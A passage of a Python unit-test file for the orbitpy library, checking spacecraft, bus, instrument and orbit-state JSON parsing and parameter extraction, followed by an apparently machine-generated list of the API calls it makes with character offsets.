"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertEqual(spc2._id, 12)
# 3 instruments with multiple modes, no spacecraft id assignment
self.assertEqual(spc3.name, "Saturn")
self.assertEqual(spc3.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertEqual(len(spc3.instrument), 3)
# 1st instrument
self.assertEqual(spc3.instrument[0].get_id(), 'bs1')
self.assertEqual(spc3.instrument[0].get_mode_id()[0], '0')
# 2nd instrument
self.assertIsNotNone(spc3.instrument[1].get_id())
self.assertIsNotNone(spc3.instrument[1].get_mode_id()[0], '0')
# 3rd instrument
self.assertEqual(spc3.instrument[2].get_id(), 'bs3')
self.assertEqual(spc3.instrument[2].get_mode_id()[0], 0)
self.assertEqual(spc3.instrument[2].get_mode_id()[1], 1)
self.assertIsNotNone(spc3.instrument[2].get_mode_id()[2])
self.assertEqual(spc3.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertIsNotNone(spc3._id)
def test_get_instrument(self):
spc1 = Spacecraft.from_json(spc1_json)
spc2 = Spacecraft.from_json(spc2_json)
spc3 = Spacecraft.from_json(spc3_json)
# spc1 has 1 instrument with id 'bs1'
self.assertEqual(spc1.get_instrument(sensor_id='bs1'), spc1.instrument[0])
self.assertEqual(spc1.get_instrument(), spc1.instrument[0]) # no sensor_id specification
self.assertIsNone(spc1.get_instrument('bs2')) # wrong sensor_id
# spc2 has no instruments
self.assertIsNone(spc2.get_instrument())
# spc3 has three instruments
self.assertEqual(spc3.get_instrument(sensor_id='bs1'), spc3.instrument[0])
self.assertEqual(spc3.get_instrument(), spc3.instrument[0])
self.assertEqual(spc3.get_instrument(sensor_id='bs3'), spc3.instrument[2])
def test_add_instrument(self): #TODO
pass
def test_add_to_list(self): #TODO
pass
def test_get_id(self): #TODO
pass
def test_to_dict(self): #TODO
pass
'''
def test___eq__(self):
o1 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertEqual(o1, o2)
# spacecraft bus different (orientation)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
# instrument different (fieldOfViewGeometry)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":15 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
# orbitState different (date)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":15 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":3, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
'''
class TestUtilModuleFunction(unittest.TestCase):
def test_helper_extract_spacecraft_params(self):
# 1 instrument, 1 mode
o1 = Spacecraft.from_json('{"@id": "sp1", "name": "Mars", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# no instruments
o2 = Spacecraft.from_json('{"@id": 12, "name": "Jupyter", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# 3 instruments with multiple modes, no spacecraft id assignment
o3 = Spacecraft.from_json('{"name": "Saturn", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": [ \
{ "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" \
}, \
{ "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, \
"mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} \
], \
"numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" \
}, \
{ "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, \
"maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, \
"mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, \
{"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, \
{ "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} \
], \
"numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" \
} \
], \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# single sc tests
x = orbitpy.util.helper_extract_spacecraft_params([o1])
self.assertEqual(len(x), 1)
self.assertEqual(x[0].sc_id, 'sp1')
self.assertEqual(x[0].instru_id,'bs1')
self.assertEqual(x[0].mode_id, '0')
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
self.assertAlmostEqual(x[0]. fov_width, 5.0)
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
# spacecraft with no instruments
x = orbitpy.util.helper_extract_spacecraft_params([o2])
self.assertEqual(len(x), 1)
self.assertEqual(x[0].sc_id, 12)
self.assertIsNone(x[0].instru_id)
self.assertIsNone(x[0].mode_id)
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertIsNone(x[0].fov_height)
self.assertIsNone(x[0]. fov_width)
self.assertIsNone(x[0].for_height)
self.assertIsNone(x[0].for_width)
x = orbitpy.util.helper_extract_spacecraft_params([o3])
self.assertEqual(len(x), 8)
self.assertIsNotNone(x[0].sc_id)
self.assertIsNotNone(x[1].sc_id)
self.assertIsNotNone(x[2].sc_id)
self.assertIsNotNone(x[3].sc_id)
self.assertIsNotNone(x[4].sc_id)
self.assertIsNotNone(x[5].sc_id)
self.assertIsNotNone(x[6].sc_id)
self.assertIsNotNone(x[7].sc_id)
self.assertEqual(x[0].instru_id,'bs1')
self.assertIsNotNone(x[1].instru_id)
self.assertEqual(x[2].instru_id,'bs3')
self.assertEqual(x[3].instru_id,'bs3')
self.assertEqual(x[4].instru_id,'bs3')
self.assertEqual(x[5].instru_id,'bs3')
self.assertEqual(x[6].instru_id,'bs3')
self.assertEqual(x[7].instru_id,'bs3')
self.assertEqual(x[0].mode_id, '0')
self.assertEqual(x[1].mode_id, 101)
self.assertEqual(x[2].mode_id, 0)
self.assertEqual(x[3].mode_id, 0)
self.assertEqual(x[4].mode_id, 1)
self.assertEqual(x[5].mode_id, 1)
self.assertIsNotNone(x[6].mode_id)
self.assertIsNotNone(x[7].mode_id)
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[1].sma, 6878.136999999998)
self.assertAlmostEqual(x[2].sma, 6878.136999999998)
self.assertAlmostEqual(x[3].sma, 6878.136999999998)
self.assertAlmostEqual(x[4].sma, 6878.136999999998)
self.assertAlmostEqual(x[5].sma, 6878.136999999998)
self.assertAlmostEqual(x[6].sma, 6878.136999999998)
self.assertAlmostEqual(x[7].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
self.assertAlmostEqual(x[1].fov_height, 5.0)
self.assertAlmostEqual(x[2].fov_height, 5.0)
self.assertAlmostEqual(x[3].fov_height, 5.0)
self.assertAlmostEqual(x[4].fov_height, 5.0)
self.assertAlmostEqual(x[5].fov_height, 5.0)
self.assertAlmostEqual(x[6].fov_height, 5.0)
self.assertAlmostEqual(x[0]. fov_width, 5)
self.assertAlmostEqual(x[1]. fov_width, 5)
self.assertAlmostEqual(x[2]. fov_width, 10.0)
self.assertAlmostEqual(x[3]. fov_width, 10.0)
self.assertAlmostEqual(x[4]. fov_width, 10.0)
self.assertAlmostEqual(x[5]. fov_width, 10.0)
self.assertAlmostEqual(x[6]. fov_width, 10.0)
self.assertAlmostEqual(x[7]. fov_width, 10.0)
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[1].for_height, 5.0)
self.assertAlmostEqual(x[2].for_height, 5.0)
self.assertAlmostEqual(x[3].for_height, 5.0)
self.assertAlmostEqual(x[4].for_height, 5.0)
self.assertAlmostEqual(x[5].for_height, 5.0)
self.assertAlmostEqual(x[6].for_height, 5.0)
self.assertAlmostEqual(x[7].for_height, 5.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
self.assertAlmostEqual(x[1].for_width, 10.0)
self.assertAlmostEqual(x[2].for_width, 15.0)
self.assertAlmostEqual(x[3].for_width, 15.0)
self.assertAlmostEqual(x[4].for_width, 15.0)
self.assertAlmostEqual(x[5].for_width, 15.0)
self.assertAlmostEqual(x[6].for_width, 15.0)
self.assertAlmostEqual(x[7].for_width, 15.0)
# test multiple spacecraft list, test first and last element of the resultant list
x = orbitpy.util.helper_extract_spacecraft_params([o1, o2, o3])
self.assertEqual(len(x), 10)
self.assertEqual(x[0].sc_id, 'sp1')
self.assertEqual(x[0].instru_id,'bs1')
self.assertEqual(x[0].mode_id, '0')
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
self.assertAlmostEqual(x[0]. fov_width, 5.0)
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
self.assertEqual(x[1].sc_id, 12)
self.assertIsNotNone(x[2].sc_id)
self.assertEqual(x[3].sc_id, x[2].sc_id)
self.assertEqual(x[4].sc_id, x[2].sc_id)
self.assertEqual(x[5].sc_id, x[2].sc_id)
self.assertEqual(x[6].sc_id, x[2].sc_id)
self.assertEqual(x[7].sc_id, x[2].sc_id)
self.assertEqual(x[8].sc_id, x[2].sc_id)
self.assertEqual(x[9].sc_id, x[2].sc_id)
self.assertEqual(x[9].instru_id,'bs3')
self.assertIsNotNone(x[9].mode_id)
self.assertAlmostEqual(x[9].sma, 6878.136999999998)
self.assertAlmostEqual(x[9].fov_height, 5.0)
self.assertAlmostEqual(x[9]. fov_width, 10.0)
self.assertAlmostEqual(x[9].for_height, 5.0)
self.assertAlmostEqual(x[9].for_width, 15.0)
def test_extract_auxillary_info_from_state_file(self): # TODO
pass
class TestGroundStation(unittest.TestCase): #TODO
pass
class TestUtilFunctions(unittest.TestCase):
def test_dictionary_list_to_object_list(self): #TODO
pass
def test_object_list_to_dictionary_list(self): #TODO
pass
def test_initialize_object_list(self): #TODO
pass
def test_add_to_list(self): #TODO
pass
class TestOutputInfoUtility(unittest.TestCase): #TODO
pass
|
[
"orbitpy.util.OrbitState.from_json",
"orbitpy.util.OrbitState.state_from_dict",
"propcov.Rvector6",
"numpy.deg2rad",
"orbitpy.util.SpacecraftBus.from_json",
"propcov.AbsoluteDate.fromJulianDate",
"instrupy.Instrument.from_json",
"orbitpy.util.OrbitState.date_from_dict",
"orbitpy.util.Spacecraft.from_json",
"instrupy.util.Orientation.from_dict",
"orbitpy.util.OrbitState.from_dict",
"propcov.AbsoluteDate.fromGregorianDate"
] |
[((442, 515), 'orbitpy.util.OrbitState.date_from_dict', 'OrbitState.date_from_dict', (["{'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}"], {}), "({'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75})\n", (467, 515), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((582, 713), 'orbitpy.util.OrbitState.date_from_dict', 'OrbitState.date_from_dict', (["{'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25, 'hour': 6,\n 'minute': 0, 'second': 0}"], {}), "({'@type': 'GREGORIAN_UTC', 'year': 2021, 'month':\n 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0})\n", (607, 713), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((839, 990), 'orbitpy.util.OrbitState.state_from_dict', 'OrbitState.state_from_dict', (["{'@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6867, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}"], {}), "({'@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL',\n 'sma': 6867, 'ecc': 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25})\n", (865, 990), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((1112, 1317), 'orbitpy.util.OrbitState.state_from_dict', 'OrbitState.state_from_dict', (["{'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': cart_state[0], 'y':\n cart_state[1], 'z': cart_state[2], 'vx': cart_state[3], 'vy':\n cart_state[4], 'vz': cart_state[5]}"], {}), "({'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL',\n 'x': cart_state[0], 'y': cart_state[1], 'z': cart_state[2], 'vx':\n cart_state[3], 'vy': cart_state[4], 'vz': cart_state[5]})\n", (1138, 1317), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((1822, 2042), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}, 'state': {'@type':\n 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': 6878.137, 'y': 0, 'z': 0,\n 'vx': 0, 'vy': 7.6126, 'vz': 0}, '@id': 123}"], {}), "({'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75\n }, 'state': {'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': \n 6878.137, 'y': 0, 'z': 0, 'vx': 0, 'vy': 7.6126, 'vz': 0}, '@id': 123})\n", (1842, 2042), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2435, 2715), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25,\n 'hour': 6, 'minute': 0, 'second': 0}, 'state': {'@type':\n 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}}"], {}), "({'date': {'@type': 'GREGORIAN_UTC', 'year': 2021,\n 'month': 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0}, 'state': {\n '@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': \n 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}})\n", (2455, 2715), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((3219, 3427), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}, 'state': {'@type':\n 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': 6878.137, 'y': 0, 'z': 0,\n 'vx': 0, 'vy': 7.6126, 'vz': 0}}"], {}), "({'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75\n }, 'state': {'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': \n 6878.137, 'y': 0, 'z': 0, 'vx': 0, 'vy': 7.6126, 'vz': 0}})\n", (3239, 3427), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((4098, 4392), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25,\n 'hour': 6, 'minute': 0, 'second': 0}, 'state': {'@type':\n 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}, '@id': '123'}"], {}), "({'date': {'@type': 'GREGORIAN_UTC', 'year': 2021,\n 'month': 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0}, 'state': {\n '@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': \n 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}, '@id': '123'})\n", (4118, 4392), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((5231, 5467), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (5254, 5467), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((5865, 5938), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "Microsat", "mass": 100, "volume": 1}"""'], {}), '(\'{"name": "Microsat", "mass": 100, "volume": 1}\')\n', (5888, 5938), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((6319, 6467), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}"""'], {}), '(\n \'{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}\'\n )\n', (6342, 6467), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((6856, 7026), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}"""'], {}), '(\n \'{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}\'\n )\n', (6879, 7026), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((7445, 7681), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (7468, 7681), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((8500, 8736), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (8523, 8736), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((8742, 8980), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}\'\n )\n', (8765, 8980), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9019, 9255), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (9042, 9255), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9373, 9595), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, "@id":123}\'\n )\n', (9396, 9595), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9601, 9851), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}\'\n )\n', (9624, 9851), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9965, 9996), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc1_json'], {}), '(spc1_json)\n', (9985, 9996), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((10014, 10045), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc2_json'], {}), '(spc2_json)\n', (10034, 10045), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((10063, 10094), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc3_json'], {}), '(spc3_json)\n', (10083, 10094), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((13966, 13997), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc1_json'], {}), '(spc1_json)\n', (13986, 13997), False, 'from orbitpy.util import OrbitState, 